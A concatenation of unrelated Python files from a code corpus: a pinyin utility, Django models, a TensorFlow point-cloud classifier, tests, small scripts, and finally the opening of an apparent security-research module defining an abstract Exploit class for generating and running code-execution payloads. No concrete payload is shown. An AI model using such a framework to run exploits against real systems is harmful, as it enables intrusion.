    '?', ',', '!', '。', ';', '“', '”', ':', '–', '—', '*',
    '…', '、', '~', '-', '(', ')', '─', '<', '>', '.', '《', '》',
    '%', '·', '’', '‘', '……', '【', '】',
    # Standard special chars
    '`', '~', '!', '@', '#', '^', '&', '*', '(', ')', '-', '_',
    '[', ']', '{', '}', '\\', '|', ';', ':', '\'', '"', ',', '<', '.',
    '>', '/', '?',
    # Maths
    '=', '+', '-', '/', '%',
    # Currency chars
    '$', '¥', '£', '€'
}
def write_lines(lines, path):
    """Write each entry of |lines| to |path|, preceded by a 'Line N:' header.

    A trailing 'Line N+1:' header is emitted after the last entry so that
    read_lines() can detect where the final entry ends.
    """
    with open(path, 'w+') as out:
        count = 0
        for count, text in enumerate(lines, start=1):
            out.write('Line ' + str(count) + ':\n')
            out.write(text)
        out.write('Line ' + str(count + 1) + ':\n')
def read_lines(path):
    """Read back a file in the format produced by write_lines().

    Entries are delimited by header lines containing 'Line'; the text between
    two consecutive headers becomes one returned entry.

    NOTE: a *content* line containing the substring 'Line' is misparsed as a
    header — this is inherent to the file format.

    Args:
        path: file to parse.

    Returns:
        List of entry strings (each typically ends with a newline).
    """
    lines = []
    buffered = ''
    first = True
    with open(path, 'r') as f:
        for line in f.readlines():
            if 'Line' in line:
                if first:
                    first = False
                    continue
                lines.append(buffered)
                buffered = ''
            else:
                buffered += line
    # Bug fix: flush the final entry even when the file lacks the trailing
    # 'Line N:' header.  Files written by write_lines() always have it, in
    # which case |buffered| is empty here and nothing extra is appended.
    if buffered:
        lines.append(buffered)
    return lines
def add_pinyin(zh_string, zh_dict, special={},
               do_not_parse=do_not_parse_set):
    """Return |zh_string| followed by a newline and its pinyin transcription.

    Strings present in |special| are mapped to their canned transcription.
    Otherwise the pinyin tokens from get_pinyin() are joined with single
    spaces, except that members of |do_not_parse| (punctuation) and the very
    first token are attached without a leading space.
    """
    if zh_string in special:
        return zh_string + '\n' + special[zh_string] + '\n'
    tokens = get_pinyin(zh_string, zh_dict, do_not_parse)
    pieces = [zh_string + '\n']
    first = True
    for token in tokens:
        if token in do_not_parse or first:
            pieces.append(token)
        else:
            pieces.append(' ' + token)
        first = False
    return ''.join(pieces) + '\n'
def get_pinyin(zh_string, zh_dict, do_not_parse=do_not_parse_set):
    """Segment |zh_string| with jieba and map each segment to pinyin.

    Lookup order per segment: whole-word entry in |zh_dict|; otherwise the
    segment itself when it is punctuation or starts with a Latin-1 character;
    otherwise a character-by-character dictionary lookup, falling back to the
    raw character.
    """
    result = []
    for word in tuple(jieba.cut(zh_string, cut_all=False)):
        if word in zh_dict:
            result.append(zh_dict[word]['pinyin'])
        elif word in do_not_parse or ord(word[0]) < 255:
            result.append(word)
        else:
            for char in word:
                result.append(zh_dict[char]['pinyin'] if char in zh_dict
                              else char)
    return result
def get_dictionary(numeric=False):
    """Load the CC-CEDICT dictionary (numeric tones if |numeric| is True,
    diacritic tones otherwise)."""
    path = numeric_dict if numeric == True else diacritic_dict
    return parse_dict(path)
def parse_dict(path):
    """Parse the CC-CEDICT file at |path| via the bundled cc_cedict_parser."""
    return cc_cedict_parser.parse_dict(path)
if __name__ == '__main__':
    # Executed as a script: use an absolute import of the bundled parser.
    from data import cc_cedict_parser
    print(diacritic_dict)
else:
    # Imported as part of the package: use a relative import instead.
    from .data import cc_cedict_parser
| 3.09375 | 3 |
test.py | yuvraj9/key-value-store | 2 | 12766771 | from tests.cli import commands
from click.testing import CliRunner
def test_get_not_found():
    """kv get <key> for a missing key yields a 404 JSON payload.

    The key does not exist yet, so the CLI reports "Key Doesn't exist" with a
    404 status_code while still exiting successfully.
    """
    outcome = CliRunner().invoke(commands, ['get', 'lamsbda'])
    expected = '{"status_code": 404, "error": "Key Doesn\'t exist"}\n\n'
    assert outcome.exit_code == 0
    assert outcome.output == expected
def test_put_value():
    """kv put <key> <value> stores the pair and echoes it back as JSON."""
    outcome = CliRunner().invoke(commands, ['put', 'key1', 'value1'])
    assert outcome.exit_code == 0
    assert outcome.output == '{"key1": "value1"}\n\n'
def test_get_value():
    """kv get <key> returns the value stored by the preceding put test.

    This also validates the put sub command end to end.
    """
    outcome = CliRunner().invoke(commands, ['get', 'key1'])
    assert outcome.exit_code == 0
    assert outcome.output == '{"value": "value1"}\n\n'
| 2.90625 | 3 |
3DmFV-Net-master/models/voxnet_3dmfv.py | wangzihaoyt36/PointnetEnhanced | 0 | 12766772 | <reponame>wangzihaoyt36/PointnetEnhanced<filename>3DmFV-Net-master/models/voxnet_3dmfv.py
import tensorflow as tf
import numpy as np
import math
import sys
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(BASE_DIR, '../utils'))
import tf_util
from transform_nets import feature_transform_net
def placeholder_inputs(batch_size, n_points, gmm):
    """Create TF placeholders for the point clouds, labels and GMM parameters.

    Args:
        batch_size: number of point clouds per batch.
        n_points: number of points per cloud.
        gmm: fitted GMM whose means_ attribute has shape (n_gaussians, D).

    Returns:
        Tuple (points_pl, labels_pl, w_pl, mu_pl, sigma_pl).
    """
    # Placeholders for the data
    n_gaussians = gmm.means_.shape[0]
    D = gmm.means_.shape[1]
    labels_pl = tf.placeholder(tf.int32, shape=(batch_size))
    w_pl = tf.placeholder(tf.float32, shape=(n_gaussians))
    mu_pl = tf.placeholder(tf.float32, shape=(n_gaussians, D))
    sigma_pl = tf.placeholder(tf.float32, shape=(n_gaussians, D))  # diagonal covariance only
    points_pl = tf.placeholder(tf.float32, shape=(batch_size, n_points, D))
    return points_pl, labels_pl, w_pl, mu_pl, sigma_pl
def get_model(points, w, mu, sigma, is_training, bn_decay=None, weigth_decay=0.005, add_noise=False, num_classes=40):
    """3DmFV classification network: Fisher-vector grid + small 3D CNN.

    Args:
        points: BxNx3 point clouds.
        w, mu, sigma: GMM weights / means / diagonal sigmas.  The number of
            Gaussians must be a perfect cube (reshaped into a res^3 grid).
        is_training: bool tensor controlling batchnorm/dropout (and noise).
        bn_decay: batch-norm decay schedule tensor.
        weigth_decay: L2 weight decay factor (parameter name kept as-is for
            caller compatibility, despite the typo).
        add_noise: if True, add small Gaussian noise to the Fisher vectors
            during training only (data augmentation).
        num_classes: number of output classes.

    Returns:
        (logits, fv): B x num_classes class scores and the raw Fisher-vector
        representation.
    """
    batch_size = points.get_shape()[0].value
    n_points = points.get_shape()[1].value
    n_gaussians = w.shape[0].value
    # Grid resolution: the Gaussians are assumed to lie on a res^3 grid.
    res = int(np.round(np.power(n_gaussians, 1.0 / 3.0)))

    fv = tf_util.get_fv_minmax(points, w, mu, sigma, flatten=False)

    if add_noise:
        # Only inject noise while training; at eval time add exact zeros.
        noise = tf.cond(is_training,
                        lambda: tf.random_normal(shape=tf.shape(fv), mean=0.0, stddev=0.01, dtype=tf.float32),
                        lambda: tf.zeros(shape=tf.shape(fv)))
        # noise = tf.random_normal(shape=tf.shape(fv), mean=0.0, stddev=0.01, dtype=tf.float32)
        fv = fv + noise

    # Arrange the Fisher vector as a 3D voxel grid with channels last.
    grid_fisher = tf.reshape(fv, [batch_size, -1, res, res, res])
    grid_fisher = tf.transpose(grid_fisher, [0, 2, 3, 4, 1])

    # 3D Voxnet with pfv
    layer = 1
    net = tf_util.conv3d(grid_fisher, 32, [5, 5, 5], scope='conv' + str(layer),
                         stride=[2, 2, 2], padding='SAME', bn=True,
                         bn_decay=bn_decay, is_training=is_training)
    layer = layer + 1
    net = tf_util.conv3d(net, 32, [3, 3, 3], scope='conv' + str(layer),
                         stride=[1, 1, 1], padding='SAME', bn=True,
                         bn_decay=bn_decay, is_training=is_training)
    layer = layer + 1
    net = tf_util.max_pool3d(net, [2, 2, 2], scope='maxpool' + str(layer), stride=[2, 2, 2], padding='SAME')

    net = tf.reshape(net, [batch_size, -1])

    # Classifier
    net = tf_util.fully_connected(net, 128, bn=True, is_training=is_training,
                                  scope='fc1', bn_decay=bn_decay, weigth_decay=weigth_decay)
    net = tf_util.dropout(net, keep_prob=0.7, is_training=is_training,
                          scope='dp1')
    net = tf_util.fully_connected(net, num_classes, activation_fn=None, scope='fc4', is_training=is_training, weigth_decay=weigth_decay)

    return net, fv
def inception_module(input, n_filters=64, kernel_sizes=[3, 5], is_training=None, bn_decay=None, scope='inception'):
    """Inception-style 3D block: parallel 1x1x1 / kxkxk convs plus avg-pool.

    NOTE(review): |kernel_sizes| is a mutable default argument; it is only
    read here, but a tuple default would be safer.

    Args:
        input: feature tensor (channels-last, as produced by tf_util.conv3d).
        n_filters: base channel count; each spatial branch uses n_filters/2.
        kernel_sizes: two kernel edge lengths for the spatial conv branches.
        is_training, bn_decay: batch-norm controls forwarded to tf_util.
        scope: variable-scope prefix for all layers of this module.

    Returns:
        Channel-wise (axis=4) concatenation of the four branch outputs.
    """
    one_by_one = tf_util.conv3d(input, n_filters, [1, 1, 1], scope=scope + '_conv1',
                                stride=[1, 1, 1], padding='SAME', bn=True,
                                bn_decay=bn_decay, is_training=is_training)
    three_by_three = tf_util.conv3d(one_by_one, int(n_filters / 2), [kernel_sizes[0], kernel_sizes[0], kernel_sizes[0]], scope=scope + '_conv2',
                                    stride=[1, 1, 1], padding='SAME', bn=True,
                                    bn_decay=bn_decay, is_training=is_training)
    five_by_five = tf_util.conv3d(one_by_one, int(n_filters / 2), [kernel_sizes[1], kernel_sizes[1], kernel_sizes[1]], scope=scope + '_conv3',
                                  stride=[1, 1, 1], padding='SAME', bn=True,
                                  bn_decay=bn_decay, is_training=is_training)
    average_pooling = tf_util.avg_pool3d(input, [kernel_sizes[0], kernel_sizes[0], kernel_sizes[0]], scope=scope + '_avg_pool', stride=[1, 1, 1], padding='SAME')
    average_pooling = tf_util.conv3d(average_pooling, n_filters, [1, 1, 1], scope=scope + '_conv4',
                                     stride=[1, 1, 1], padding='SAME', bn=True,
                                     bn_decay=bn_decay, is_training=is_training)
    output = tf.concat([one_by_one, three_by_three, five_by_five, average_pooling], axis=4)
    # output = output + tf.tile(input) ??? #resnet
    return output
def get_loss(pred, label):
    """Softmax cross-entropy classification loss plus L2 weight decay.

    Args:
        pred: B x NUM_CLASSES logits.
        label: B integer class labels.

    Returns:
        Scalar total loss (classification + accumulated 'losses' collection).
    """
    # Weight decay terms are accumulated into the 'losses' collection by the
    # tf_util layer helpers.
    weight_decay_losses = tf.get_collection('losses')
    weight_decay_loss = tf.reduce_sum(weight_decay_losses)
    loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=pred, labels=label)
    # Alternative with label smoothing, kept for reference:
    # loss = tf.losses.softmax_cross_entropy(logits=pred , onehot_labels=tf.one_hot(tf.to_int32(label),depth=40), label_smoothing=0.128)
    classify_loss = tf.reduce_mean(loss)
    tf.summary.scalar('classify loss', classify_loss)
    tf.summary.scalar('weight_decay_loss', weight_decay_loss)
    return classify_loss + weight_decay_loss
if __name__ == '__main__':
    # Graph-construction smoke test (no session is run).
    with tf.Graph().as_default():
        inputs = tf.zeros((32, 1024, 3))
        # Bug fix: get_model() requires (points, w, mu, sigma, is_training);
        # the previous call passed only (inputs, is_training) and raised a
        # TypeError.  Build a dummy 8-Gaussian model — a 2x2x2 grid, since the
        # grid resolution is the cube root of the number of Gaussians.
        w = tf.fill([8], 1.0 / 8.0)
        mu = tf.zeros((8, 3))
        sigma = tf.fill([8, 3], 0.1)
        outputs = get_model(inputs, w, mu, sigma, tf.constant(True))
        print(outputs)
| 1.96875 | 2 |
app/wrapper/models.py | Sirius-social/TMTM | 0 | 12766773 | import os
import hashlib
import secrets
from django.db import models
from django.core.cache import cache
from django.db.models.signals import pre_save, pre_delete, post_migrate
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField, ArrayField
def import_class(name):
    """Import and return an attribute (typically a class) given its dotted path.

    Fixes the naive ``__import__(top)`` + getattr chain, which only worked when
    every submodule had already been imported (it failed for paths such as
    ``django.core.files.storage.FileSystemStorage``).
    """
    import importlib
    module_path, _, attr_name = name.rpartition('.')
    if not module_path:
        # Bare module name with no attribute part.
        return importlib.import_module(name)
    try:
        mod = importlib.import_module(module_path)
    except ImportError:
        # The tail may be an attribute chain rather than a module path
        # (e.g. "collections.OrderedDict.fromkeys"): import the root and
        # walk attributes, as the original implementation effectively did.
        parts = name.split('.')
        mod = importlib.import_module(parts[0])
        for comp in parts[1:-1]:
            mod = getattr(mod, comp)
    return getattr(mod, attr_name)
class UserEntityBind(models.Model):
    """Associates a Django user with an external entity id; each pair is unique."""
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='entities')
    # Opaque external entity identifier.
    entity = models.CharField(max_length=64)
    class Meta:
        unique_together = ('entity', 'user')
class Ledger(models.Model):
    """A named ledger scoped to an entity; (entity, name) is unique."""
    entity = models.CharField(max_length=64, db_index=True, null=True)
    name = models.CharField(max_length=512, db_index=True)
    # Arbitrary JSON metadata attached to the ledger.
    metadata = JSONField(null=True, default=None)
    # Participant identifiers (presumably DIDs/entity ids) — TODO confirm.
    participants = ArrayField(models.CharField(max_length=128), null=True)
    class Meta:
        unique_together = ('entity', 'name')
class Transaction(models.Model):
    """A single transaction within a Ledger; seq_no is unique per ledger."""
    ledger = models.ForeignKey(Ledger, on_delete=models.CASCADE)
    # Raw transaction payload.
    txn = JSONField()
    seq_no = models.IntegerField(null=True)
    metadata = JSONField(null=True, default=None)
    created = models.DateTimeField(auto_now_add=True, db_index=True, null=True)
    # Entity that submitted/performed the transaction.
    actor_entity = models.CharField(max_length=64, db_index=True, null=True)
    class Meta:
        unique_together = ('seq_no', 'ledger')
class GURecord(models.Model):
    """Cargo/shipment record scoped to an entity and category.

    All shipment fields are stored as free-form strings; ``attachments``
    holds JSON metadata for attached documents.
    """
    entity = models.CharField(max_length=64, db_index=True)
    category = models.CharField(max_length=36, db_index=True)
    no = models.CharField(max_length=128)
    date = models.CharField(max_length=128)
    cargo_name = models.CharField(max_length=128)
    depart_station = models.CharField(max_length=128)
    arrival_station = models.CharField(max_length=128)
    month = models.CharField(max_length=128)
    year = models.CharField(max_length=128)
    decade = models.CharField(max_length=128)
    tonnage = models.CharField(max_length=128)
    shipper = models.CharField(max_length=128)
    attachments = JSONField()
class Content(models.Model):
    """Uploaded file: a metadata row plus a blob saved via a pluggable Django storage."""
    STORAGE_FILE_SYSTEM = 'django.core.files.storage.FileSystemStorage'
    SUPPORTED_STORAGE = [
        (STORAGE_FILE_SYSTEM, 'FileSystemStorage'),
    ]
    id = models.CharField(max_length=128, db_index=True)
    # Primary key: random hex id plus the original file extension.
    uid = models.CharField(max_length=128, primary_key=True)
    entity = models.CharField(max_length=1024, null=True, db_index=True)
    name = models.CharField(max_length=512, db_index=True)
    content_type = models.CharField(max_length=1024, null=True, db_index=True)
    # Dotted path of the storage backend class (resolved by import_class).
    storage = models.CharField(max_length=256, db_index=True, choices=SUPPORTED_STORAGE, default=STORAGE_FILE_SYSTEM)
    created = models.DateTimeField(null=True, auto_now_add=True)
    updated = models.DateTimeField(null=True, auto_now=True)
    is_avatar = models.BooleanField(default=False)
    size_width = models.IntegerField(null=True)
    size_height = models.IntegerField(null=True)
    delete_after_download = models.BooleanField(default=False, db_index=True)
    encoded = models.BooleanField(default=False, db_index=True)
    download_counter = models.IntegerField(default=0, db_index=True)
    md5 = models.CharField(max_length=128, null=True)
    @property
    def url(self):
        """Public URL of this file under MEDIA_URL."""
        return settings.MEDIA_URL + self.uid
    def get_storage_instance(self):
        """Instantiate the storage backend class named by ``self.storage``."""
        cls = import_class(self.storage)
        return cls()
    def set_file(self, file):
        """Persist an uploaded *file*: assign a random uid, save the blob, record md5.

        NOTE(review): reads the whole file into memory to compute the md5 —
        consider chunked hashing for large uploads.
        """
        self.name = file.name
        self.content_type = file.content_type
        _, ext = os.path.splitext(file.name.lower())
        self.id = secrets.token_hex(16)
        self.uid = self.id + ext
        self.get_storage_instance().save(self.uid, file)
        file.seek(0)
        content = file.read()
        self.md5 = hashlib.md5(content).hexdigest()
        self.entity = settings.AGENT['entity']
        pass
    def delete(self, using=None, keep_parents=False):
        """Delete the stored blob (best-effort) and then the DB row."""
        try:
            self.get_storage_instance().delete(self.uid)
        except NotImplementedError:
            pass
        super().delete(using, keep_parents)
class Token(models.Model):
    """Opaque API token bound to a user and the local agent entity."""
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    created = models.DateTimeField(auto_now_add=True)
    # Random hex token value presented by API clients.
    value = models.CharField(max_length=128, db_index=True)
    entity = models.CharField(max_length=1024, db_index=True)
    @staticmethod
    def allocate(user: User):
        """Create and return a fresh random token for *user*."""
        inst = Token.objects.create(
            user=user,
            value=secrets.token_hex(16),
            entity=settings.AGENT['entity']
        )
        return inst
def clear_txn_caches(instance, *args, **kwargs):
    """Signal handler: drop inbox/ledger caches so readers see fresh data."""
    cache.delete(settings.INBOX_CACHE_KEY)
    cache.delete(settings.LEDGERS_CACHE_KEY)
# Invalidate caches on any save/delete/migrate touching Ledger or Transaction.
pre_save.connect(clear_txn_caches, sender=Ledger)
pre_save.connect(clear_txn_caches, sender=Transaction)
pre_delete.connect(clear_txn_caches, sender=Ledger)
pre_delete.connect(clear_txn_caches, sender=Transaction)
post_migrate.connect(clear_txn_caches, sender=Ledger)
post_migrate.connect(clear_txn_caches, sender=Transaction)
| 1.992188 | 2 |
is_blinkee_nearby.py | terenaa/is-blinkee-nearby | 1 | 12766774 | <reponame>terenaa/is-blinkee-nearby
# -*- coding: utf-8 -*-
from Notifier import Discord
from Blinkee import Blinkee, BlinkeeApi
import argparse
if __name__ == "__main__":
    # CLI: either list available regions (-a) or search for scooters nearby (-s).
    parser = argparse.ArgumentParser()
    exclusive_group = parser.add_mutually_exclusive_group(required=True)
    exclusive_group.add_argument("-s", "--search", action="store_true", help="search scooters nearby")
    exclusive_group.add_argument("-a", "--regions", action="store_true", help="show available regions")
    searching_group = parser.add_argument_group("Search scooters nearby")
    searching_group.add_argument("-o", "--origin", help="starting point coordinates xx.xxx,yy.yyy")
    searching_group.add_argument("-r", "--region", help="chosen region ID")
    searching_group.add_argument("-d", "--distance", help="distance in meters")
    parser.add_argument("-w", "--webhook", help="notifier webhook url", required=False)
    args = parser.parse_args()
    if args.regions:
        regions = BlinkeeApi().get_regions()
        if not regions:
            # NOTE(review): falls through and prints the (empty) table header
            # below even when there are no regions — confirm an early exit
            # was not intended.
            print("No available regions.")
        row_format = u"{:<5}" * 2
        print("Available regions:\n")
        print(row_format.format("ID", "Region"))
        print(row_format.format("--", "------"))
        for region in regions:
            print(row_format.format(region["id"], region["name"]))
    elif args.search:
        if args.origin is None or args.region is None or args.distance is None:
            parser.error("Search option requires origin, region and distance.")
        # Discord notifications are optional; enabled only when a webhook is given.
        discord = Discord(args.webhook) if args.webhook is not None else None
        blinkee = Blinkee(origin=tuple(args.origin.split(",")), region_id=int(args.region), distance=int(args.distance),
                          notifier=discord)
        blinkee.show()
        blinkee.notify()
| 2.625 | 3 |
lib/python/treadmill/tests/keytabs_test.py | krcooke/treadmill | 133 | 12766775 | """Unit test for keytabs
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import io
import os
import shutil
import tempfile
import unittest
import mock
from treadmill import keytabs
class KeytabsTest(unittest.TestCase):
    """test keytabs function
    """
    def setUp(self):
        # Fresh spool directory per test.
        self.spool_dir = tempfile.mkdtemp()
    def tearDown(self):
        shutil.rmtree(self.spool_dir)
    def _touch_file(self, name):
        """Create an empty keytab principal file in the spool directory."""
        with io.open(os.path.join(self.spool_dir, name), 'w'):
            pass
    @mock.patch('treadmill.subproc.check_call')
    def test_add_keytabs_to_file(self, mock_check_call):
        """test add keytabs princ files into dest file
        """
        self._touch_file('HTTP#foo@realm')
        self._touch_file('HTTP#bar@realm')
        self._touch_file('host#foo@realm')
        self._touch_file('host#bar@realm')
        keytabs.add_keytabs_to_file(self.spool_dir, 'host', 'krb5.keytab')
        # Directory listing order is backend-dependent, so accept the two
        # matching 'host#...' files in either argument order.
        try:
            mock_check_call.assert_called_once_with(
                [
                    'kt_add', 'krb5.keytab',
                    os.path.join(self.spool_dir, 'host#foo@realm'),
                    os.path.join(self.spool_dir, 'host#bar@realm'),
                ]
            )
        except AssertionError:
            # then should called with files in other order
            mock_check_call.assert_called_once_with(
                [
                    'kt_add', 'krb5.keytab',
                    os.path.join(self.spool_dir, 'host#bar@realm'),
                    os.path.join(self.spool_dir, 'host#foo@realm'),
                ]
            )
if __name__ == '__main__':
unittest.main()
| 2.4375 | 2 |
scrapper.py | macbuse/twitter_bots | 0 | 12766776 | <gh_stars>0
import re
import requests
url = 'https://www.brainyquote.com/topics/problems-quotes'
url = 'https://www.brainyquote.com/topics/science-quotes'
pp = re.compile('<a href="/quotes/(.*?)_\d+.*?>(.*?)</a>',re.DOTALL)
r = requests.get(url)
def clean(x):
    """Normalize an (author_slug, quote) pair scraped from brainyquote.

    Turns the author slug (e.g. "albert_einstein") into a title-cased display
    name and decodes HTML entities in the quote text.

    Fixes: ``html`` was never imported (NameError on first call), and doubled
    underscores in a slug produced an IndexError on the empty segment.
    """
    import html
    author, quote = x
    # Capitalize each underscore-separated part, skipping empty segments.
    bits = [part[0].upper() + part[1:] for part in author.split('_') if part]
    return ' '.join(bits), html.unescape(quote)
list_of_quotes = [ clean(xx) for xx in pp.findall(r.text)]
| 2.859375 | 3 |
misc/j3.py | dk00/old-stuff | 0 | 12766777 | #!/usr/bin/env python
import sys
import time
print sys.stdin.readline()
time.sleep(3)
exit(99)
| 1.765625 | 2 |
tests/conftest.py | mikedingjan/python-param-store | 10 | 12766778 | <reponame>mikedingjan/python-param-store<gh_stars>1-10
import boto3
def pytest_configure():
    """Pytest hook: pin a default boto3 session region for the whole test run."""
    boto3.setup_default_session(region_name="eu-west-1")
| 1.53125 | 2 |
catkin_ws/src/vehicle_follow/scripts/following_node.py | championway/DuckietownPi2 | 1 | 12766779 | <reponame>championway/DuckietownPi2
#!/usr/bin/env python
import rospy
import numpy as np
import math
import time
from std_msgs.msg import Bool, Float32
from duckietown_msgs.msg import Twist2DStamped, VehiclePose, AprilTags, BoolStamped
from sensor_msgs.msg import Joy
class Follow(object):
    """ROS node that follows a target vehicle while steering around obstacles.

    Fixes: the original file did not parse (the pose callbacks and the
    controller branches contained only comments, i.e. empty suites), the
    controller referenced an undefined ``obstacle`` name, and shutdown
    unregistered a non-existent ``sub_target_pose_bumper`` attribute.
    The navigation logic itself is still a TODO.
    """

    def __init__(self):
        self.node_name = rospy.get_name()
        self.car_cmd_msg = Twist2DStamped()
        self.target_angle = Float32()
        self.obstacle_angle = Float32()
        # Latest poses received from the perception pipeline (None until first msg).
        self.target_pose = None
        self.obstacle_pose = None
        #-----Publication-----
        self.pub_car_cmd = rospy.Publisher("~car_cmd", Twist2DStamped, queue_size=1)
        #-----Subscriptions-----
        self.sub_target_pose = rospy.Subscriber("~target_pose", VehiclePose, self.cb_target_pose, queue_size=1)
        self.sub_obstacle_pose = rospy.Subscriber("~obstacle_pose", VehiclePose, self.cb_obstacle_pose, queue_size=1)
        # safe shutdown
        rospy.on_shutdown(self.custom_shutdown)

    def cb_target_pose(self, msg):
        # Store the pose of the target (x, y, z, o).
        self.target_pose = msg

    def cb_obstacle_pose(self, msg):
        # Store the pose of the obstacle (x, y, z, o).
        self.obstacle_pose = msg

    def control_vehicle(self, pose, obstacle=False):
        """Steer toward *pose*; when *obstacle* is True, skirt the obstacle edge.

        ``obstacle`` was a free (undefined) variable in the original — it is
        now an explicit keyword argument, keeping the old one-arg call form.
        """
        if not obstacle:
            # TODO: navigate to target (drive target_angle to 0).
            pass
        else:
            # TODO: navigate to the edge of the obstacle (drive obstacle_angle to 0).
            pass

    def stop_vehicle(self):
        """Publish a zero-velocity command."""
        self.car_cmd_msg.v = 0.0
        self.car_cmd_msg.omega = 0.0
        self.pub_car_cmd.publish(self.car_cmd_msg)

    def custom_shutdown(self):
        """Unregister subscribers and halt the vehicle before exiting."""
        rospy.loginfo("[%s] Shutting down..." % self.node_name)
        # Stop listening
        self.sub_target_pose.unregister()
        self.sub_obstacle_pose.unregister()
        # Send stop command to car command switch
        self.car_cmd_msg.v = 0.0
        self.car_cmd_msg.omega = 0.0
        self.pub_car_cmd.publish(self.car_cmd_msg)
        rospy.sleep(0.5)  # To make sure that it gets published.
        rospy.loginfo("[%s] Shutdown" % self.node_name)
if __name__ == "__main__":
rospy.init_node("follow_node", anonymous=False)
lane_supervisor_node = Follow()
rospy.spin()
| 2.34375 | 2 |
project/get-project.py | Akaito/codesaru-environ | 1 | 12766780 | """
The MIT License (MIT)
Copyright (c) 2015 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import json
import os
import subprocess
from urllib import request
repo_sources = [
'https://api.github.com/users/Akaito/repos?type=all',
]
class Repo:
    """Lightweight view of a GitHub repository record."""

    @classmethod
    def from_github_json(cls, jsn):
        """Build a Repo from one GitHub API repository JSON object."""
        repo = cls()
        repo.name = jsn['name']
        # The short project title is whatever follows the environ prefix.
        repo.title = repo.name[len('codesaru-environ_project_'):]
        repo.description = jsn['description']
        repo.clone_url = jsn['clone_url']
        return repo

    def __repr__(self):
        return self.title
def find_repos(jsn):
    """Filter GitHub repo JSON objects down to codesaru-environ project repos."""
    matches = []
    for entry in jsn:
        repo = Repo.from_github_json(entry)
        # Keep only successfully parsed repos whose name carries the project prefix.
        if repo is not None and 'codesaru-environ_project_' in repo.name:
            matches.append(repo)
    return matches
def main():
    """Fetch repo listings, show codesaru-environ projects, and clone the user's pick."""
    global repo_sources
    repos = []
    for repo_source_url in repo_sources:
        response = request.urlopen(repo_source_url)
        response_content = response.read()
        repos_jsn = json.loads(response_content.decode())
        repos.extend(find_repos(repos_jsn))
    # present list of codesaru-environ/project compatible repos
    for i in range(len(repos)):
        print(i + 1, '--', repos[i].title)
        print('    ', repos[i].description)
    # Re-prompt until a valid 1-based index is entered.
    user_choice = 0
    while int(user_choice) < 1 or int(user_choice) > len(repos):
        user_choice = input('Enter project number to download: ')
    user_choice = int(user_choice) - 1
    repo = repos[user_choice]
    subprocess.call(['git', 'clone', repo.clone_url, repo.title])
if __name__ == "__main__":
prior_dir = os.getcwd()
main()
os.chdir(prior_dir)
| 2.171875 | 2 |
tests/flatpages_tests/urls.py | ni-ning/django | 61,676 | 12766781 | <gh_stars>1000+
from django.contrib.flatpages.sitemaps import FlatPageSitemap
from django.contrib.sitemaps import views
from django.urls import include, path
# Sitemap endpoint plus the standard flatpages and auth URL includes.
urlpatterns = [
    path(
        'flatpages/sitemap.xml', views.sitemap,
        {'sitemaps': {'flatpages': FlatPageSitemap}},
        name='django.contrib.sitemaps.views.sitemap'),
    path('flatpage_root/', include('django.contrib.flatpages.urls')),
    path('accounts/', include('django.contrib.auth.urls')),
]
| 1.382813 | 1 |
netbox/payment/admin.py | cbipoe3ka/new-netbox-2.9 | 0 | 12766782 | from django.contrib import admin
# Register your models here.
from .models import Payment, ContractFile, Company, Contractor
@admin.register(Company)
class Company(admin.ModelAdmin):
    """Admin for the Company model; lists only the name column.

    NOTE(review): this ModelAdmin rebinds (shadows) the imported ``Company``
    model name after registration — consider renaming to ``CompanyAdmin``.
    """
    list_display = (
        'name',
    )
@admin.register(Contractor)
class Contractor(admin.ModelAdmin):
    """Admin for the Contractor model; lists only the name column.

    NOTE(review): shadows the imported ``Contractor`` model name, as above.
    """
    list_display = (
        'name',
    )
0x0B-python-input_output/0-read_file.py | Rmolimock/holbertonschool-higher_level_programming | 1 | 12766783 | <filename>0x0B-python-input_output/0-read_file.py
#!/usr/bin/python3
def read_file(filename=""):
'''open a given file'''
with open(filename, 'r') as f:
print("{}".format(f.read()), end="")
| 3.421875 | 3 |
code_execution/execution_base.py | gbleaney/python_security | 31 | 12766784 | import asyncio
import inspect
import logging
from abc import ABC, abstractclassmethod
from collections import defaultdict
from typing import Callable, Set, Type, Dict, List, Union
from json import JSONEncoder
class Exploit(ABC):
    """Base class describing one code-execution exploit: payload builder + runner
    plus metadata used for reporting/serialization."""
    # NOTE(review): ``abstractclassmethod`` is deprecated and these signatures
    # omit ``cls`` — confirm whether they are meant as plain classmethods.
    @abstractclassmethod
    def generate_payload(command: str) -> Union[str, List[str]]:
        pass
    @abstractclassmethod
    def run_payload(payload: str) -> None:
        pass
    # Either a callable (fully-qualified name is derived) or a ready-made string.
    vulnerable_function: Union[Callable, str] = None
    source: str = ""
    category_name: str = ""
    notes: str = ""
    @classmethod
    def get_vulnerable_function_fqn(cls):
        """Return the fully-qualified name of the vulnerable function."""
        return (
            cls.vulnerable_function
            if isinstance(cls.vulnerable_function, str)
            else (
                cls.vulnerable_function.__module__
                + "."
                + cls.vulnerable_function.__qualname__
            )
        )
)
class AsyncEventLoop:
    """Context manager that installs a fresh asyncio event loop and closes it on exit."""

    def __enter__(self):
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
